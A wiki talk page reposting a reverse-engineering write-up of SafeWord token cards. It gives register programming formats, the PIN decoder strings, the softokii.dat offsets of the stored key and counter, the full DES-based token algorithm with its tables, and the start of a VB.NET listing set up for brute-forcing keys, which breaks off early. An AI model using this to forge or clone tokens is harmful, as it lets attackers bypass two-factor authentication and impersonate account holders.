User talk:SimoneSimon

Safeword Cards; how do they work...
Safeword cards are designed by Secure Computing (www.securecomputing.com). They are small devices that generate codes for authentication called "Tokens" or "Secure Tokens".

The card can have 2 modes; (A) A Token Generator, and (B) A Challenge-Response generator.

This document focuses more on the Token Generator's end, later releases of this document will focus more on the other end.

Due to copyrights etc, the author's details for this document has been unknown for more than a year despite seeing mutiple versions of this document over the web.

The card's idea is very simple; when a user want's to access a resource (web / device / etc) it asks for a User-ID and a User-Token, the client then uses his/her Token-Card to generate a code to key it in, the server would then check the code to see if it's a valid one (matches what the server thinks it's the right code, just like in passwords verification), once verified to be a valid code, the server would then accept the authentication-code and tells the requestor to allow the resource's usage by that user. If the code is a valid one also, that code along with any previous codes generated are no longer valid. This is very useful when the customer is sitting in an Internet cafe or any publid place where users are highly likely to see his pass-code entered into the system, as this technology would prevent this since the code is only valid once.

These cards has 2 types, some of them are synchronised using the exact-time when generating (i.e. when configuring the card, it's time is synchronised with the server to ensure that both are generating and authenticating using the same time), to make the card useful to the user, the new code is generated once every 15 seconds, no matter how many times you generate a code, it would throw in the same code during each 15 seconds intervals, our article does not cover these cards, since the cards manufactured by SecureComputing are asynchonious-cards and does *not* take time into consideration!. So, how does it work then really!?

Well, the idea is very simple, the card generates a code which is only a 5-Digit counter encrypted via some DES encryption functions and the result is a 6-Digit-encoded HEX counter that should match a "range" of the what the server is counting to be authenticated at the end.

When a card is initially programmed by a company-administrator, the counter is always reset to "00000" upon generating a token, the counter is incremented by 1 each time a new code is generated, also on the server's end, it saves the last counter-value used by the card locally on the User-ID's file / database, this makes it a very good and secure way to keep customers isolated from each other and that counters does not get mixed-up between each different user.

Upon programming a safeword card at the company-administrator's end, and in either for cards does not get mixed-up, each card must have something called a "key", this key is the heart of the encryption and used to generate any codes from that card. simply, the card uses an algorithm to scramble and encrypt the 5-digit-counter with that key which is set by the company-admin where the card uses that key to encode and then the server uses the same key to decode the token data, the server would then compare the value of the decrypted token with it's own last-used counter-value, where it should be between "what it has" and "what is has + 16", if matched, then the code is valid. If not, (i.e. greator or less than the above), then the code is invalid.

If the "keys" between the server and the card does not match the very likely possibility is that the decrypted counter number would be significantly out of the above range which results is a denied-access, and also prevents other company-users from using their cards to access other users' cards.

Sounds so secure, however, when you come to think of it deeply, it is possible that if the server decrypts a token that has a completey different key to match the same range resulting in an access-permitted. This is a very slight chance, but it is very possible and likely to happen. Which is why the server blocks the user's account upon 3 bad access-attempts, but still, would not prevent the spoofing on this manner.

Zooming on the operational side of it, the key can be a standard DES key (7-Hex Bytes -i.e.- 14-Digit-Hex Value ) or a 3DES key exactly the same as the DES key but multiplied by 3 times using the same encryption.

When Secure computing first designed these cards about 10 years ago, it would've been impossible for PC these days to brute-force these keys since they where no where near the power and capabilities of what PC's (or even small handheld devices) can do today. I mean 10 years ago, PC's where measured in MegaHertz, today we are talking about GigaHertz and TerraBytes etc, which are 1000's of times more powerful than what we used to have 10 years ago. Unfortunately these secure-computing token-cards has not changed that much since, hence having article like this one can be very embarrasing to the maker itself.

What does a company administrator do to program the card?

An administrator usually would use the built-in system to generate a new card using a random generated 7-hex-bytes (or if the company is smart enough, they would've already came up with their own Random-Code generators) but must keep track of each individuals not to create 2 cards with the same key for obvious reasons!.

The administrator then would program a card using one of 2 methods; either by using the hardware-card-programmer (AKA Secure Computing's Pen Programmer) or entereing the codes manually into the card to program it.

We are not concerned with the PEN Programmer here unless you have bought yourself one of the PEN-Copiers from somewhere like eBay which are very hard to get hold of since they can copy a card into another one to steal the user's identity, just like any other copier that can copy your credit card details into another one for a theif to steal some money out of your own credit card as if you have used it yourself... yeah, as if you didn't know!....

Programming the card manually can be done by holding the "0" and "A" and "ON" together to power it on (For the Platinum Card types), it would then starts asking you to fill in the register-details, the registeres are from 00 to 15 on the new cards, and from 0 to 7 on the older cards, these registeres are described below.

Each of the registeres takes 7 digits octal value; which consists of 2 x Octal value of 3 digits plus a checksum digit at the end. The checksum which is simple to work out; it's done by adding each of the initial 6 other digits together and then the Least Significant Digit of the sumation would be taken as the last digit to form the checksum digit.

For example, to fill in PC00 with any data, you can do something like "1101230" where the this means that the value is "110" for the 1st register (which is equal to 48 Hex), and "123" for the 2nd register (means 53 Hex), and then the checksum is "0" where it is (1+1+0+1+2+3 = 10 Octal) we only take the 1st digit from the checksum to place it in the final checksum digit at the end.

Now, each register is broken down below:

Register:	1st Register		2nd Register

=
============		============ PC00:		DES01 			DES02 PC01:		DES03 			DES04 PC02:		DES05 			DES06 PC03:		DES07 			(1st Nibble: NoOfHosts), (2nd Nibble: 1=Challenge/Response, F=Synchronous)

PC04:		??? Pinrequest PC05:		(AOIP 1st Nibble) 	dPIN1 PC06:		dPIN2			dPIN3 PC07:		dPIN4			X

PC08:		DES08			DES09 PC09:		DES0A			DES0B PC10:		DES0C			DES0D PC11:		DES0E			X

PC12:		DES0F			DES10 PC13:		DES11			DES12 PC14:		DES13			DES14 PC15:		DES15			X

---

AOIP: ACtion on Invalid PIN (Nibble): 0000: DelayOperation 0001: None 0010 - 1111: (No Of Attempts to disable 2-15 attempts)

---

Care should be taken here, where you can change the funcationality of the card you are programming when these reigsteres changes, for example, disabling the PIN number reuquest can be done when you change PC04 from 0210069 into 0210665 and vice-versa.

Now, we discussed earlier on how the card works, it takes 7-bytes for the DES key or 7+7+7 for a 3DES value, these are shown above, for example to program a DES key of HEX: "11223344556677" into your card, then you would do the following:

1) Convert each Hex Byte into Octal Byte, the result would be 021, 042, 063, 104, 125, 146, 167 2) Workout the checksum as explained above, the final first 4 registeres would look like the following:

PC00: 0210429		(021 in Octal is 11 in Hex, and 042 in Octal is 22 in Hex, 9 is the Checksum that comes from 0+2+1+0+4+2 = 9) PC01: 0631044 PC02: 1251463 PC03: 167???x		(167 in Octal is 77 in Hex, the ??? is a value that you can configure from the description above, the X is the checksum to be calculated later by you).

---

PC04: 0210069 -or- 0210665 (with PIN -or- without PIN).

PC05: 000P01x		(P01: is the 1st digit of your PIN number, X would be the checksum) PC06: P02P03x		(P02: is the 2nd digit of your PIN number, P03: is the 3rd digit, X is the checksum) PC07: P04???x		(P04: is the 4th digit of your PIN number, ???: not sure really, probably another digit of the PIN, not checked yet, X is the checksum).

PC08 - PC15 		Can all be set to "0000000" unless you need to program 3DES data in there.

Once completed, you will see "***********" and then "Complete". After this stage, your 5-Digit-Login-counter would be reset to 0, and your PIN would be set to what you programmed above.

---

There are few tools designed by SecureComputing (Safeword Cards, Platinum Cards, Gold Card AKA 3000 Cards, DLL-Type Libraries for logins AKA SoftTokens, etc).

All the above works in the same way, they use very similar algorithms to generate the login token.

Basically, regardless of what you are using, there are two versions of the equation that generates a token known as Version-1 and Version-2), which are similar in some respect, the only different between version-1 and version-2 is that version-1 uses the 1st byte of the formula where version-2 uses the last byte of the formula for all calculations.

The main thing that you need to know now is that the Token is simply a HEX code, despite seeing any other digits that does not looks like a HEX code, for an example, once you generated a new Token, you would see something like 0PA7CH, notice the "P" and the "H" in this example these two does not look like a hex-code since they are after the letter "F", however, if you substitute the "P" with "D" and the "H" with "B", then it becomes more clearer, and the result is "0DA7CB". YOu might wonder why?, well, 2 reasons:

1) When showing a real HEX code with LCD displays (or 7-Segment-Displays), it would be difficult to distinguish between ("8" and "B") and also ("0" and "D") since the same circuit-wires are used hence users making errors etc.

2) COnfusing; and therefore; more secure!

The rest of the digits (i.e. "0" to "F" apart from "B" and "D" mentioned above) remains the same in the generated token.

Finally, before jumping to the advanced bit, you need to know (if you don't already) that cards can be programmed to either ask you for a PIN number for them to generate a proper code, or without a PIN number where it generates a Token once switched on, it depends on how you program it at the end.

-

Zooming in Further on how the Token is generated...

The above is all the basic stuff you need to know about how your Safeword card works. If you are interested in more details about it, read below...

If you like working with HEX codes, and encryption formulas, then you might love this (below), just like SnakeHead/4841 and I used to work back in the good old School days, I miss those days as life changed A LOT since then especially if you know us...

Now, focusing back on the card itself; the token is generated from the following sequence:

1) Assuming your card asks for a PIN number already, then you would enter a 4 (or 6) digit PIN number into it. 2) Assuming that your PIN is always a 4-Digit PIN number you enter to your SafeWord Card Token-Generator; 3) The Original 7-hex-bytes "Key" that is already stored in your card (always, unless you power it off, or re-program it) is always encrypted in your card's memory and need to be decoded starting from the next step; 4) The system then append the PIN number you entered with one of it's 4-built-in decoder strings, generally it's the Enigma string. String-Decoder-1: (FF, 45, 6E, 69, 67, 6D, 61, 80), also known as the Enigma String, since the bytes mentioned is equivilant to "0xff, "Enigma", 0x80)	String-Decoder-2: (FF, 4C, 6F, 67, 69, 63, 2c, 80), also known as the Logic String, since the bytes mentioned is equivilant to "0xff, "Logic,", 0x80) String-Decoder-3: (03, CE, 4A, A3, 56, 77, F2, 91) String-Decoder-4: (81, 35, F0, 14, 1D, BC, E8, 62)

The result is your PIN you entered plus another 4-Digits of one of the above String-Decoders to make up an 8-Byte code to be used to decrypt the original key for usage.

By the way; for SoftToken files (i.e if you are not using a real card and that you have a SoftToken software installed to generate your token then the encrypted KEY is usually stored under your "softokii.dat" at location 00000535H, and it's 20H bytes long. 5) The Key is then decoded using a DES function (EncryptDecryptToken) which can be downloaded below.

6) At this stage, we should have the 7-Bytes original KEY here as it's originally stored/programmed into the card decoded here, if the PIN to decode the card is a valid PIN code, then the result should decode into ASCII bytes (i.e. Bytes within the range of 30h - 39h and 41h - 5Ah and 61h - 7Ah; i.e. they can be read as characters if they are within these ranges), i.e. it should be decoded into 14 bytes that are effectively 7-characters of an ASCII Hex Code Bytes which are the original KEY. Otherwise, if the PIN entered ot the card is wrong, and in this case, the Card would generate a standard(fixed) key that means nothing to use and continue below...

7) At ths step, Regardless of the PIN entered above, the decoded KEY here should be a valid code which is what we need below...

8) Now, the 1st step here is to take the 7-Byte key (i.e. 14 Hex Digits), and convert it into an 8-Byte key. this is done by converting each 8-bit byte into a 7-bit byte that has the LSB bit reset. Basically, this is done by just shifting all the bits to the right keeping bit-0 of each byte unused and reset to 0, the result is a 8-Byte Key with Bit-0 not used in each byte. Example below:

Key7 (Original):	10101011 01010101 10101010 01010101 10101010 01010101 10101010 			i.e. Hex Code: AB 55 AA 55 AA 55 AA Key8 (Converted):	10101010 10101010 01101010 01001010 01011010 01010010 01010110 01010100 	i.e. Hex Code: AA AA 6A 4A 5A 52 56 54

9) After getting the 8-Bytes, another scrambelling equation is used to rotate the bit locations from one to another, I won't describe it here in full, please download and check the equation where it scrambelles the bits above using a table, the function is GenerateScrambled1Array.

A) The purpose of the procedure below is basically to rotate the bits above, as explained below:

Key8:		10101010 10101010 			01101010 			01001010 			01011010 			01010010 			01010110 			01010100

Scrambelled:	11000000 00111111			11100000			00001111			11111000			00000010			11111110			00000000

B) Host DIsplacement:	If you card asks for a HOST? when you power it up, then it would do the following:		B1) Take the original Key (A1B2C3D4E5F67) and then concatinate it with itself, the result is: A1B2C3D4E5F67A1B2C3D4E5F67 B2) take 14 digits (i.e. 7 bytes) from the location pointed to by Host-1, i.e. if your host is 5, then we take the string from location 4 for 14 digits long, the result is: C3D4E5F67A1B2C		B3) Store it into the TokenCode array to be referred to in (18) below.

D) Counter Extraction and Calculation:           The Counter to be used is here; this is what stored in your safeword card (or softtoken if you use a software) and incremented by 1 whenever a new (good or bad) token is generated. It's a 5-nibble counter (i.e. 20 bit)		Usually, it would take a 32-bit entry and scramble it; eg. for a counter of 1A,2B,3C,4D, the Result would be => A1 B2 CA 1B 2C -> Repeat (i.e. A1 B2 CA 1B 2C - A1 B2 CA 1B 2C - A1 B2 CA 1B 2C - ...)

*By the way; for SoftToken files (i.e if you are not using a real card and that you have a SoftToken software installed to generate your token then the Token-COUNTER is usually stored under your "softokii.dat" at location 000005b8H, and it's 8 bytes long.

The counter therefore will be used in the below routines where it will be encrypted against the 7-to-8 bytes array to result in the new DES code.

10)  The above is just an example to rotate the rows into columns, and not necessary illustrate the exact rotation since there is a table controlling this, but this should give you an idea about what is happening there, as this is the closest I can describe this function to you since the exact function has few bytes rotated in slightly different way due to using the table to rotate, to understand it more, download and read the functions as described above.

The exact rotation array is below, there are 2 arrays here, one to do the ODD values and the other to do the EVEN values, the below table is in HEX code:

Odd Table: 	= (39, 31, 29, 21, 19, 11, 09, 01, 3A, 32, 2A, 22, 1A, 12, 0A, 02, 3B, 33, 2B, 23, 1B, 13, 0B, 03, 3C, 34, 2C, 24) Even Table: 	= (3F, 37, 2F, 27, 1F, 17, 0F, 07, 3E, 36, 2E, 26, 1E, 16, 0E, 06, 3D, 35, 2D, 25, 1D, 15, 0D, 05, 1C, 14, 0C, 04)

The above works by taking the byte-location vs. the value as to where to displace, for an example, the 1st element in the table above is "39h" which is located at the 1st location in the array, therefore, it means take the byte located at position 39h from the original string (the original KEY from the above) and place it into location 1 in the new array (some equations do this and others do the reverse opposite to this i.e. taking the byte located at position 0 and placing it under position 39h in the new array. Ttherefore, the above ODD and EVEN tables cannot contain duplicate values as it would overwrite, the above tables have been extracted from the original SafeWord card itself and are accurate.

-

11) The next step is to build the encryption tables using a PUSH-Type table, depending on the equation and the encryption type, there can be two types of this function; (A) A forward direction and; (B) a reverse direction.

This tables built with this function usually stay in the memory and always are used to generate the new re-coded keys, i.e. once you put batteries in or re-program your Safeword card, this step would be only used once to build these tables and store them in memory to be used whenever a new token is to generated.

The PUSH functions are aligned to generate either one of two (a forward direction or a reverse direction) below:

If Direction = "forward" Then SubTable01 = BuildSubTable(SourceTable, 00) SubTable02 = BuildSubTable(SourceTable, 01) SubTable03 = BuildSubTable(SourceTable, 03) SubTable04 = BuildSubTable(SourceTable, 05) SubTable05 = BuildSubTable(SourceTable, 07) SubTable06 = BuildSubTable(SourceTable, 09) SubTable07 = BuildSubTable(SourceTable, 0B) SubTable08 = BuildSubTable(SourceTable, 0D) SubTable09 = BuildSubTable(SourceTable, 0E) SubTable0A = BuildSubTable(SourceTable, 10) SubTable0B = BuildSubTable(SourceTable, 12) SubTable0C = BuildSubTable(SourceTable, 14) SubTable0D = BuildSubTable(SourceTable, 16) SubTable0E = BuildSubTable(SourceTable, 18) SubTable0F = BuildSubTable(SourceTable, 1A) SubTable10 = BuildSubTable(SourceTable, 1B) Else ' otherwise: it's a reverse direction: SubTable10 = BuildSubTable(SourceTable, 00) SubTable0F = BuildSubTable(SourceTable, 01) SubTable0E = BuildSubTable(SourceTable, 03) SubTable0D = BuildSubTable(SourceTable, 05) SubTable0C = BuildSubTable(SourceTable, 07) SubTable0B = BuildSubTable(SourceTable, 09) SubTable0A = BuildSubTable(SourceTable, 0B) SubTable09 = BuildSubTable(SourceTable, 0D) SubTable08 = BuildSubTable(SourceTable, 0E) SubTable07 = BuildSubTable(SourceTable, 10) SubTable06 = BuildSubTable(SourceTable, 12) SubTable05 = BuildSubTable(SourceTable, 14) SubTable04 = BuildSubTable(SourceTable, 16) SubTable03 = BuildSubTable(SourceTable, 18) SubTable02 = BuildSubTable(SourceTable, 1A) SubTable01 = BuildSubTable(SourceTable, 1B) End If

Each SubTable will be stored in memory and used in the described functions below to generate the token...

12) Now, as you have noticed, each table is being built from a call to BuildSubTable(SourceTable, Offset), this function uses the same displacement routines mentioned above to re-fit each byte of the array using the following displacement table:

TableScrambler = (0E, 11, 0B, 18, 01, 05, 03, 1C, 0F, 06, 15, 0A, 17, 13, 0C, 04, 1A, 08, 10, 07, 1B, 14, 0D, 02, 45, 50, 3B, 41, 4B, 53, 3A, 44, 4F, 49, 3D, 4C, 48, 4D, 43, 54, 3E, 51, 4A, 46, 4E, 40, 39, 3C )

the function to generate the SubTable using the TableScrambler above is:

For I = 0 To length of(TableScramblerSub) B = TableScramblerSub(I) B = SourceArray(Offset + B)   TempBuffer(I) = B   Next

The result is returned from TempBuffer into each table to generate above, i.e. this table is called 16 times per direction from the Forward/Reverse caller as mentioned above.

13) Now, once the above PUSH tables has been created, then if the required is a DES then it goes through the sequence described below, if it's a 3DES, then the same sequence it repeated 3 times for all the 3 KEYs to be used (i.e. 3DES):

This function is the core of this encryption:

A) Convert the 8-Bytes counter (i.e. the data) into a BIT array: each bit of the 8-bytes (i.e. 64 bits) is converted into a byte on it's own. example: 48h would be 01001000b, each bit would be converted into a byte, the result is an   8-bytes array (0,1,0,0,1,0,0,0) got it?!

B) Scramble the converted 8-bytes from above (A) into 3 arrays using the process below using and ODD and EVEN scrambling tables where Arrays 1 and 3 are identical (EVENly scramblled) and 2 is ODDly scramblled.

For I = 0 To 1F B = ODD_SCRAMBLING_TABLE(I) ScrambelledPart02(I) = SourceArray(B - 1)

B = EVEN_SCRAMBLING__TABLE(I) ScrambelledPart01(I) = SourceArray(B - 1) ScrambelledPart03(I) = SourceArray(B - 1) Next

Where:

ODD_SCRAMBLING_TABLE = (3A, 32, 2A, 22, 1A, 12, 0A, 02, 3C, 34, 2C, 24, 1C, 14, 0C, 04, 3E, 36, 2E, 26, 1E, 16, 0E, 06, 40, 38, 30, 28, 20, 18, 10, 08) EVEN_SCRAMBLING_TABLE = (39, 31, 29, 21, 19, 11, 09, 01, 3B, 33, 2B, 23, 1B, 13, 0B, 03, 3D, 35, 2D, 25, 1D, 15, 0D, 05, 3F, 37, 2F, 27, 1F, 17, 0F, 07)

C) Use all PUSH tables to Scramble the above generated result by calling the following procedure 16 times (i.e. one per each table) where the function is a a 4-part XOR scrambling routine:   ScrambleXOR1Pin(PushesSubTable01, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True)    ScrambleXOR1Pin(PushesSubTable02, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True)    ScrambleXOR1Pin(PushesSubTable03, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True)    ScrambleXOR1Pin(PushesSubTable04, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable05, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable06, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable07, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable08, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable09, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0A, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0B, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0C, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0D, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0E, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable0F, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2, OverwriteSource:= True) ScrambleXOR1Pin(PushesSubTable10, ScrambledBitBytePIN_P1, PinScramblingXORedResult, PinScrambledDecodedResult) : XorArrays(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P3, OverwriteSource:= False)

(Tables for scrambling below: Table2 = (20, 01, 02, 03, 04, 05, 04, 05, 06, 07, 08, 09, 08, 09, 0A, 0B, 0C, 0D, 0C, 0D, 0E, 0F, 10, 11, 10, 11, 12, 13, 14, 15, 14, 15, 16, 17, 18, 19, 18, 19, 1A, 1B, 1C, 1D, 1C, 1D, 1E, 1F, 20, 01) Table3 = (10, 07, 14, 15, 1D, 0C, 1C, 11, 01, 0F, 17, 1A, 05, 12, 1F, 0A, 02, 08, 18, 0E, 20, 1B, 03, 09, 13, 0D, 1E, 06, 16, 0B, 04, 19 ) EncryptionTable = (E, 0, 4, F, D, 7, 1, 4, 2, E, F, 2, B, D, 8, 1, 3, A, A, 6, 6, C, C, B, 5, 9, 9, 5, 0, 3, 7, 8, 4, F, 1, C, E, 8, 8, 2, D, 4, 6, 9, 2, 1, B, 7 , F, 5, C, B, 9, 3, 7, E, 3, A, A, 0, 5, 6, 0, D, F, 3, 1, D, 8, 4, E, 7, 6, F, B, 2, 3, 8, 4, E, 9, C, 7, 0, 2, 1, D, A, C, 6, 0, 9, 5, B, A, 5 , 0, D, E, 8, 7, A, B, 1, A, 3, 4, F, D, 4, 1, 2, 5, B, 8, 6, C, 7, 6, C, 9, 0, 3, 5, 2, E, F, 9, A, D, 0, 7, 9, 0, E, 9, 6, 3, 3, 4, F, 6, 5, A 		, 1, 2, D, 8, C, 5, 7, E, B, C, 4, B, 2, F, 8, 1, D, 1, 6, A, 4, D, 9, 0, 8, 6, F, 9, 3, 8, 0, 7, B, 4, 1, F, 2, E, C, 3, 5, B, A, 5, E, 2, 7, C 		 , 7, D, D, 8, E, B, 3, 5, 0, 6, 6, F, 9, 0, A, 3, 1, 4, 2, 7, 8, 2, 5, C, B, 1, C, A, 4, E, F, 9, A, 3, 6, F, 9, 0, 0, 6, C, A, B, 1, 7, D, D, 8 , F, 9, 1, 4, 3, 5, E, B, 5, C, 2, 7, 8, 2, 4, E, 2, E, C, B, 4, 2, 1, C, 7, 4, A, 7, B, D, 6, 1, 8, 5, 5, 0, 3, F, F, A, D, 3, 0, 9, E, 8, 9, 6 , 4, B, 2, 8, 1, C, B, 7, A, 1, D, E, 7, 2, 8, D, F, 6, 9, F, C, 0, 5, 9, 6, A, 3, 4, 0, 5, E, 3, C, A, 1, F, A, 4, F, 2, 9, 7, 2, C, 6, 9, 8, 5 , 0, 6, D, 1, 3, D, 4, E, E, 0, 7, B, 5, 3, B, 8, 9, 4, E, 3, F, 2, 5, C, 2, 9, 8, 5, C, F, 3, A, 7, B, 0, E, 4, 1, A, 7, 1, 6, D, 0, B, 8, 6, D		, 4, D, B, 0, 2, B, E, 7, F, 4, 0, 9, 8, 1, D, A, 3, E, C, 3, 9, 5, 7, C, 5, 2, A, F, 6, 8, 1, 6, 1, 6, 4, B, B, D, D, 8, C, 1, 3, 4, 7, A, E, 7 , A, 9, F, 5, 6, 0, 8, F, 0, E, 5, 2, 9, 3, 2, C, D, 1, 2, F, 8, D, 4, 8, 6, A, F, 3, B, 7, 1, 4, A, C, 9, 5, 3, 6, E, B, 5, 0, 0, E, C, 9, 7, 2 , 7, 2, B, 1, 4, E, 1, 7, 9, 4, C, A, E, 8, 2, D, 0, F, 6, C, A, 9, D, 0, F, 3, 3, 5, 5, 6, 8, B		)

1) Part-1: Scrambling against Table-2 (30h bytes):

For I = 0 To 2F B = Table2(I) XORResult(I) = ScrambledPINPart01(B - 1) Xor SourceArray1(I) Next

2) Taking each bit-1 of every consequitive 6 bytes and forming a 6-bit-byte to be stored into another array:

I = 0 K = 0 Do	  B = ((XORResult(I + 0) And 1) << 5) _ Or ((XORResult(I + 1) And 1) << 4) _ Or ((XORResult(I + 2) And 1) << 3) _ Or ((XORResult(I + 3) And 1) << 2) _ Or ((XORResult(I + 4) And 1) << 1) _ Or ((XORResult(I + 5) And 1) << 0)

I = I + 6

ScrambledDecodedResult(K) = EncryptionTable((K * 40h) + B)	  K = K + 1 Loop Until I >= 2Fh

3) Taking the above result and doing a "spread" copying each byte (nibble in this case due the the displacement routines and encryption-table above), this is done by writing each byte 4 into 4-places in a new array after shifting 	one location right (i.e. if the source array contains a byte 0Fh for instance, then the result would be 0F, 07, 03, 01 into the new array)

K = 0 For I = 0 To UBound(ScrambledDecodedResult) B = ScrambledDecodedResult(I)

XORResult(K + 0) = B >> 3 '(3 - 0) XORResult(K + 1) = B >> 2 '(3 - 1) XORResult(K + 2) = B >> 1 '(3 - 2) XORResult(K + 3) = B >> 0 '(3 - 3)

K = K + 4 Next 4) Take the result from the above and then displace it using Table3 from above:

For I = 0 To &H1F B = Table3(I) ScrambledPINPart01(I) = XORResult(B - 1) Next

D) XORing the result from the above function with the 2nd table from step (B) Above, overwriting both the source and the target with the new bytes

E) Repeat the procedure as mentioned in the header of step-C above...

14) Descramble the generated results from the above 16-calls to the PUSH-tables to end up with the encrypted table below:	PinDeScrambledAfterXor = DeScrambleOddEvenPinArray(ScrambledBitBytePIN_P1, ScrambledBitBytePIN_P2)                 ' 10001810

This function takes the 2-tables and de-scramble them as described in section (10) above to do a reverse collection from an ODD and EVEN tables below: Table1_ODD = (3A, 32, 2A, 22, 1A, 12, 0A, 02, 3C, 34, 2C, 24, 1C, 14, 0C, 04, 3E, 36, 2E, 26, 1E, 16, 0E, 06, 40, 38, 30, 28, 20, 18, 10, 08) Table2_EVEN = (39, 31, 29, 21, 19, 11, 09, 01, 3B, 33, 2B, 23, 1B, 13, 0B, 03, 3D, 35, 2D, 25, 1D, 15, 0D, 05, 3F, 37, 2F, 27, 1F, 17, 0F, 07)

For I = 0 To &H1F B = Table1_ODD(I) TempBuffer(B - 1) = SourceArray1(I) Next

For I = 0 To &H1F B = Table2_EVEN(I) TempBuffer(B - 1) = SourceArray2(I) Next End If

The final result is a 64 byte array that has only bit-1 to be used from each byte

15) Converting the result above from a 64-byte array into an 8-byte array by taking only bit-1 of each byte and making a byte out of each 8-bits

I = 0 K = 0

Do   B = 0

For J = 1 To 8 B = B << 1 B = B + (SourceArray(I) And 1) I = I + 1 Next

TempBuffer(K) = B   K = K + 1 Loop Until I >= UBound(SourceArray)

16) The result is an 8-Bytes DES coded data, a repeat should be done at this step to re-generate more DES keys, i.e. a 3DES is a loop from the above step (13) till this step.

17)  We now have the initial DES key to use here, and therefore, we have the 1st digit of the token to be generated:	Now, in here it's where the distinguish between Algorithm-version-1 or Algorithm-version-2.

If it's version-1 of the encryption (Safeword Platinum) then the Working byte is: 0 (i.e. LSB), otherwise, if it's the latest, then the WorkingByte is: 7 (i.e. MSB) After generating EncryptedToken_DES1 from the above, we are now using it below:

TokenCode(WorkingByte) = ((EncryptedToken_DES1(0) Xor TokenCode(WorkingByte)) And 0Fh) Xor EncryptedToken_DES1(0) We then take the result to form the 1st nibble of the 6-digit Token key below:

FinalHexToken = (TokenCode(WorkingByte) And &HF0) >> 4

18) Looping for 2 times to get the other 2 bytes for the Token i.e. generating 4-digits for the Token below, by DES encrypting the Token7to8 that was generated from (8) above against TokenCode (step-9D above) and then rotating the 		original TokenCode for 1-byte and get the 1st byte from the array:

For I = 0 To 2 EncryptedToken_DES2 = EncryptDecryptToken(Token7to8, TokenCode, 8, 0) B = (EncryptedToken_DES2(0) Xor EncryptedCounterPlus(I)) Array.Copy(TokenCode, 1, TokenCode, 0, 7) TokenCode(7) = B

FinalHexToken = (FinalHexToken << 8) + B	 Next

19) Shift Right the FinalHexToken by 4-bits to get a 6-digit token code.

20) COnvert each D into P and each B into H, this is because the LCD display is a 7-segment display where a user cannot distinguish between an 8 and a B, and also a D and a 0, hence doing these changes to display it clearly.

The source code can be read below which is a standard .NET code with full examples:

Please note that it contains 3 modules (modMain.vb, modServer.vb, and modClient.vb), each should be done into a separate file:

'============================================================================================================================ ' 1: MOD MAIN: '============================================================================================================================

Module modMain

Private BruteForceKeyStart As Long = {0, 1}          ' Key, ThreadNumber Private ThreadBruteForceLimit As Long = &H100000       ' 60 seconds (4 seconds per &H10000's loop)

Private TokenSearch1 As String = "" Private TokenSearch2 As String = ""

Public Function GenerateByteShiftArray(ByVal SourceString As Byte, ByVal ByteLength As Byte, ByVal CleanUp As Boolean) As Byte ' If CleanUp then it would act as a GenerateBitByteArray since CleanUP would clean the unwanted 7-bits leaving only bit-1 in the new array. ' SourceString is the KeyString to hash into this SHR array ' ByteLength is the number if Bits per Byte 1 - 8. ' Returns a SHR-Byte-Encoded (i.e. &HFF with 8-Bits would be converted into 8-byte string: 01, 03, 07, 0F, 1F, 3F, 7F, FF)

Dim TempBuffer(-1) As Byte Dim I, J, Pointer As Integer Dim B As Byte

If ByteLength >= 1 And ByteLength <= 8 Then If SourceString.Length > 0 Then ReDim TempBuffer((SourceString.Length * 8) - 1) Pointer = 0

If CleanUp Then For I = 0 To UBound(SourceString) B = SourceString(I)

